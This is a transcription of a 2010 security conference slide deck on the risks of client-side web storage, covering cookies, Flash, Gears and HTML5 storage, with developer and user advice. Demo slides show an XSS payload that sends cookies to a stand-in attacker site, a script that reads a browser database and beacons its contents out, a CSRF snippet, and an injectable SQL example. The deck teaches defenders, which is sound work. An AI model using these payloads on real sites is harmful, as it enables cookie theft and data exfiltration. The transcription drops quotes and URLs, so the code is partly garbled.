The Risks of Client-Side Data Storage From cookie to database

Transcription

1 The Risks of Client-Side Data Storage From cookie to database GOVCERT.NL Symposium - 15 November 2010

2 Agenda Client-Side Data Storage (CSDS): What it is Why it s used How it s implemented Demo SecurSearch Search Engine What the risks are What you should do about it

3 Agenda Client-Side Data Storage (CSDS): What it is Why it s used How it s implemented Demo SecurSearch Search Engine What the risks are What you should do about it

4 CSDS What it is Storage of information on the PC of a user: Initiated by a website Performed by the browser or a browser plug-in Not necessarily noticed by the user Stored for an hour, a day, a month, or forever Just some bytes, kilobytes, or megabytes

5 Agenda Client-Side Data Storage (CSDS): What it is Why it s used How it s implemented Demo SecurSearch Search Engine What the risks are What you should do about it

6 CSDS Why it s used Session fixation Server fixation (load balancing) User tracking / profiling Statistics Performance Offline web application support User configuration / preferences

7 Agenda Client-Side Data Storage (CSDS): What it is Why it s used How it s implemented Demo SecurSearch Search Engine What the risks are What you should do about it

8 CSDS How it s implemented (pre HTML 5) Mechanism Default Size Description Cookies 80 KB Small text files IE User Data 640 KB XML-files Adobe Flash 100 KB LocalSharedObjects Oracle Java? Apache Derby DB Microsoft Silverlight 1 MB XML-files Google Gears Development stopped in 2010, superseded by HTML 5 Web SQL Database? SQLite database

9 CSDS How it s implemented (cookies) stats.secblog.nl Set-Cookie: SESSIONID=c22as11qr2921aa5:WI= : login.secblog.nl PWO=PQ1rpFf0DcYS01S2; expires=thu, 15-Nov-2011 rss.secblog.nl 14:50:38 GMT; path=/; domain=.secblog.nl redirect.secblog.nl video.secblog.nl Set-Cookie: VISITORID=ES1q4PWZ1A12O7jlpWpsi19sji8yhX8s7HX92; search.secblog.nl expires=sun, 15-Nov :50:38 GMT; path=/; domain=.secblog.nl; HttpOnly

10 CSDS How it s implemented (Same Origin Policy) Origin: Host : Protocol : http Port : 80 (implicit)

11 CSDS How it s implemented (JavaScript) JavaScript is used to manage much of these mechanisms Adobe supports ActionScript to JavaScript interfaces

12 CSDS How it s implemented (plug-in support) Gears 6,2% Silverlight 52,9% Java 79,4% Flash 96,8% Source: StatOwl Statistics april 2010 september 2010 (

13 CSDS How it s implemented So, what about HTML 5?

14 CSDS How it s implemented (HTML 5 storage) Mechanism Web Storage Web SQL Database Indexed Database Remarks Name/value pairs LocalStorage and SessionStorage Full client-side DB with querysupport based on SQLite Probably replaced by IndexedDB Use of indexes Endorsed by Microsoft and Mozilla

15 CSDS How it s implemented (browser support) Traditional HTML5 Cookies Adobe Flash Google Gears Microsoft Silverlight IE UserData Web Storage Web SQL Database Indexed Database API

16 CSDS How it s implemented (EverCookie)

17 Agenda Client-Side Data Storage (CSDS): What it is Why it s used How it s implemented Demo SecurSearch Search Engine What the risks are What you should do about it

18 csxss 1 <iframe width=0 height=0 src= /hack1_script.html ></iframe> 2 <script>document.location= l?q=%3c%2fa%3e%3ca+href%3d%22%22+onmouseover%3d%22javascript% 3Adocument.location%3D%27http%3A%2F%2Fwww.ihackedsecursearch. com%2fhack1.pl%3f%27+%2b+document.cookie%3b%22%3ehaha move your mouse%3c%2fa%3e ;</script> 3 </a><a href="" onmouseover="javascript:document.location=' secursearch.com/hack1.pl?' + document.cookie;">haha move your mouse</a> ;

19 csxss csxss Reflective XSS Stored XSS

20 XSS <script>if (window.opendatabase){var db=opendatabase( secursearch_db, 1.0, Web SQL Database, );db.transaction(function(tx){tx.executeSql( SELECT * FROM search_terms,[],function(tx,results){var stroutput= ;for(i=0;i<results.row.length;i++){stroutput=stro utput+results.rows.item(i)[ term ]+ *** ;}document.getelement ById( feedback ).innerhtml= <img width=1 height=1 src= +s troutput+ > ;});});}</script>

21 XSS Open database Load search term table var db=opendatabase( secursearch_db, 1.0, Web SQL Read contents of table tx.executesql( SELECT * FROM search_terms, [], for(i=0; i<results.row.length; i++){ stroutput = stroutput + results.rows.item(i)[ term ] Post contents to hacksite + *** ; } document.getelementbyid( feedback ).innerhtml = <img width=1 height=1 src= history= + stroutput + > ;

22 CSRF search[0] = how to hack ministry of internal affairs ; search[1] = blackmailing the minister ; search[2] = found backdoor in ministry website ; framehandle.src = + search[0]; framehandle.src = + search[1]; framehandle.src = + search[2];

23 Agenda Client-Side Data Storage: What it is Why it s used How it s implemented Demo What the risks are What you should do about it

24 CSDS What the risks are (technical issues) Cross-Site Scripting (XSS) Client-side XSS (csxss) Client-side SQL injection (cssqli) Browser vulnerabilities / shortcomings: WhiteHat Website Security Statistic Report - Fall 2010 Sep 22, 2010 incomplete deletion of data (e.g. plug-in data) User access to data (integrity issues)

25 CSDS What the risks are (technical issues) Same origin policy issues: Browser vulnerabilities (cs)xss Freedom in domain name DNS cache poisoning Shared servers No expiration on client-side data Use of immature technology mad-fred.secblog.nl crazy-daisy.secblog.nl maniac-jack.secblog.nl

26 CSDS What the risks are (incomplete deletion) Traditional HTML5 Cookies Adobe Flash Google Gears Microsoft Silverlight IE UserData Web Storage Web SQL Database Indexed Database API Plug-in data is never deleted! LocalStorage: SessionStorage:

27 CSDS What the risks are (damage -- user) Profiling / user tracking (privacy issues) Data leakage (also privacy issues) Data injection / information spoofing

28 CSDS What the risks are (damage -- organization) Application logic influenced: Authentication bypass (e.g. cookie theft) Use of corrupted client data by the web application Legal action

29 CSDS What the risks are (legal action) Ars Technica Jacqui Cheng Aug 16, 2010

30 CSDS What the risks are (legal action) Wired Ryan Singel Jul 27, 2010

31 Agenda Client-Side Data Storage: What it is Why it s used How it s implemented Demo What the risks are What you should do about it Geek & Poke Oliver Widder Sep 20, 2010

32 CSDS What you should do about it (as a user) Delete your client-side data frequently Restrict the information you give away Harden your browser Selectively block JavaScript Block third-party storage Delete data automatically Disable HTML5 storage (for now) Use white- and blacklists Put a strong check on your browser plug-ins Miguel Fernandez gegen-den-strich.com

33 CSDS What you should do about it (as a developer) Decide if you need local storage anyway Describe your privacy policy (be open) Prepare your webapp for no data systems Don t trust locally stored data Don t store confidential information locally

34 CSDS What you should do about it (as a developer) Take XSS vulnerabilities very seriously (or better, prevent them!) Use placeholders for SQL statements (to prevent Client-Side SQL Injection) tx.executesql ( INSERT INTO table (field) VALUES ( + strid + ) ); tx.executesql ( INSERT INTO table (field) VALUES (?), strid); Don t use HTML5 storage mechanisms yet in production (and especially not on shared servers!)

35 Conclusions Most of the threats are not new Server-side threats turn into client-side threats (csxss, cssqli) cssqli might not be such a big problem

36 Conclusions Biggest challenges are: the growing amount of information on clients how about data integrity? how about data confidentiality? plug-ins that cannot be controlled As an organization, make a distinction between: threats to your users threats to your web applications

37 Thank you for your time! Questions?